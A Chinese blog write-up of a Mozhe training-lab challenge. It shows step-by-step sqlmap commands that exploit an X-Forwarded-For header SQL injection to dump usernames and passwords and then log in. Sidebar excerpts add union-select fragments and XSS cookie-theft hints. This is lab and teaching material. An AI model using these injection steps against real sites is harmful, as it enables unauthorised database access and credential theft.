墨者 X-Forwarded-For注入漏洞

最新推荐文章于 2023-02-19 21:21:05 发布
最新推荐文章于 2023-02-19 21:21:05 发布
阅读量236 收藏 1
点赞数 2
分类专栏: 信息安全 文章标签: 安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52920608/article/details/121194640
版权

PS:这里也可以BP修改X-Forwarded-For参数, 手工报错注入updatexml函数 一步一步爆出数据,得到数据。我这里使用的sqlmap

1.打开后发现是登录界面,题目提示X-Forwarded-For,抓包:

在网站登陆处抓包,发现提示IP已被记录在这里插入图片描述修改X-Forwarded-For发现ip改变,说明X-Forwarded-For字段的内容可控,且很有可能保存在数据库当中
在这里插入图片描述

2.将数据包保存为TXT文件(我这里保存名字为xff.txt),并将X-Forwarded-For字段内容置为*,提示sqlmap该处存在sql注入漏洞。

使用sqlmap执行以下命令(这里我懒得再跑了,可能是我电脑不行,跑的有点久)
这里是我之前爬下来的数据:在这里插入图片描述

python sqlmap.py -r xff.txt

读取数据库:python sqlmap.py -r xff.txt -dbs -v 3

获取表名:python sqlmap.py -r xff.txt -D webcalendar --tables

获取列名:python sqlmap.py -r xff.txt -D webcalendar -T user columns

获取数据:python sqlmap.py -r xff.txt -D webcalendar -T user -C"id,password,username" -dump

3.利用数据库中密码登录网站获得key

在这里插入图片描述

XXX_WXY
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6297
墨者学院-X-Forwarded-For注入漏洞实战
php代码审计之x-forwarded-for注入漏洞
cj_Hydra's Blog
02-06 1880
前言: x-forwarded-for大家应该都不陌生,是用来获取客户端的ip地址的,在实际开发应用中也是非常广泛的,今天这篇博客的主要内容就是x-forwarded-for注入xss代码来获得管理员cookie。 审计的源码还是上次install.php重装漏洞的源码。 步骤: 1.访问正常用户登录页面如下:2.找到源码中对应的文件进行审计,代码如下: <?php include_once...
HTTP头注入漏洞测试(X-Forwarded-for)
qq_36933272的博客
09-02 303
进入墨者的任性网页,burp截取数据包,send to repeater 加入X-Forwarded-For 判断注入点 判断列数 order by N,发现表数量是4 回显,union select 1,2,3,4 显示表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables wher...
01#墨者靶场-X-Forwarded-For注入漏洞实战
shy的博客
11-15 693
墨者学习01 By/shy014 1.在网站登陆处抓包,发现提示IP已被记录。...
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7622
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求头中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求头,以及remote_add
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
nginx X-Forwarded-For头伪造漏洞及防范
LOOPY_Y的博客
02-19 3363
X-Forwarded-For 作为 HTTP 请求的扩展头,在请求的过程中可以被直接的进行修改。本人讲述如何通过nginx的配置进行防范
X-Forwarded-For
ChanCherry的博客
04-09 888
简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项(百度百科:用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段)。 如果没有XFF或者另外一种相似的技术,所有通过代理服务器的连接只会显示代理服务器的IP地址,而非连接发起的原始IP地址,这样的代理服务器实际上充当了匿名服务提供者...
抓包理解X-Forwarded-For和proxy_add_x_forwarded_for
Default
05-24 6300
目录 1.nginx.conf设置指令 2.发送请求,无请求头域X-Forwarded-For 3.发送请求,有请求头域X-Forwarded-For 4.理解 1.nginx.conf设置指令 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 2.发送请求,无请求头域X-Forw...
墨者X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1284
小羊学安全 任重而道远 ~
伪造 X-Forwarded-For
zpf_07的博客
09-19 1496
简单粗暴上代码!import random import requestsip_address = ['125.92.32.81', '125.92.32.82', '125.92.32.83']headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Acc
Hackergame 2021 Web题3 FLAG 助力大红包 题解(修改X-Forwarded-For)
Landasika的博客
10-31 474
本人小白入门,不到之处请大侠指点!!! 首先我们需要知道X-Forwarded-For是用来干啥的:HTTP X-Forwarded-For 介绍 | 菜鸟教程 简单来说: X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的。 有了以上基础知识
0x2A.HTTP头注入漏洞测试(X-Forwarded-for)
qq_31679787的博客
10-22 259
该题可以进行手注或者使用sqlmap; 首先进行手注,抓包后添加X-Forwarded-for:*'测试发现并没有报错,而且这样保存下来在sqlmap中检测也检测不到SQL注入; 修改为* or 1=1会报错,但是后续测试也会出问题,只有不添加ip地址或者*才能正常进行sql注入; 通过or 1=1检测是否能进行sql注入; 查询显示位,结果为4的时候显示正常; 通过联合查询查询...
墨者学院HTTP头注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1207
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4,通过union select 1,2,3,(...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XXX_WXY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值